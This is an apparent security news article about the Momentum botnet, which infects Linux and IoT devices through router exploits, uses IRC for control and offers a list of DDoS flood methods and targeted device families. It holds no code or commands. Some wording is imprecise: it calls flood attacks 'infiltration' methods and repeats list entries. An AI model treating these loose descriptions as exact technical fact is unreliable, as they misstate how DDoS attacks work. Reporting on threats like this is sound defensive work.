The Momentum botnet is one of the most attack entities online at the moment.
This is a large network of contaminated Linux and IoT hosts that can be used for large-scale sabotage campaigns. An unknown hacking group is behind its operation.
The Momentum Botnet Is One Of The Most Dangerous Weapons Encompassing Hundreds of Linux and IoT Hosts
Security researchers discovered a dangerous new botnet called Momentum that recruits both Linux and an extensive array of IoT host. According to the available information so far the hackers behind the threat are using numerous advanced techniques in order to infect the hosts which form the botnet. The Momentum botnet is categorized as especially dangerous due to the fact that its code is cross-compiled to be compatible across different architectures and platforms — ARM, Intel, MIPS, Motorola 68020 and others. This means that potential victims of the Momentum botnet can be many IoT and Linux devices — both for home office and in enterprise environments. The entity can be used to deploy various payloads including backdoors used in the large-scale Mirai attacks. In order to pass through various intrusion detection systems the botnet communication is done through the IRC protocol in order not to raise suspicion.
The main distribution technique used by the botnet is the automated vulnerability testing on target routers. Many network administrators do not update the firmware on their network devices which leaves out a lot of potential security bugs. The automated solutions will “sweep” across the networks and use exploit code in order to deploy the malware. As soon as the infection is made the Momentum botnet will install itself as a persistent threat by always starting up as soon as the computer is powered on.
The Momentum Botnet Includes an Extensive List of Capabilities
The Momentum botnet is capable of launching various DDoS attack techniques, totalling 36 different methods for infiltrating target hosts:
ACK flooder, TCP flooding, ICMP packet flooder, DNS amplification flooder, SYN flood, ExecuteSpoofedSyn Flooder, FIN flood, ACK Fragmentation Flood, Spoofed TCP Fragmentation Flooder, GRE flood,TCP connect flooder, HTTP Flooder, HTTP flooding, TCP flooder (frag), LDAP amplification flooder, MEMCACHE amplification flooder, ACK flood, SYN flooder, UDP flooding (DOMINATE), Multiple attacks at once, Random TCP flooder fragmented packet header, TCP flood, SYN flood, SYN flood, STD Flooder, STD Flooder, SYN flooder, SYN-ACK flood, TCP-Nulled flooding, UDP flood, udp flooder (vulnMix), UDP Flooder, URG attacking, Spoofed UDP Flooder, Valve Source Engine Amplification, TCP Xmas flood
The Momentum botnet includes advanced capabilities that will protect it from being detected by security solutions. This can be done via three methods — fast flux technique (resilient command and control commands), running of backdoor code and vulnerabilities exploitation. The Momentum botnet has been found to hijack devices and services across a wide range of devices including the following:
- Several CCTV DVR Models
- ZyXEL Routers
- Huawei Network Routers
- Several Content Sharing Technologies
- D-Link HNAP1
- Realtek SDK UPnP SOAP Technology-Enabled Devices
- JAWS Webserver Implementations
- Vacron NVR
- UPnP SOAP Command Execution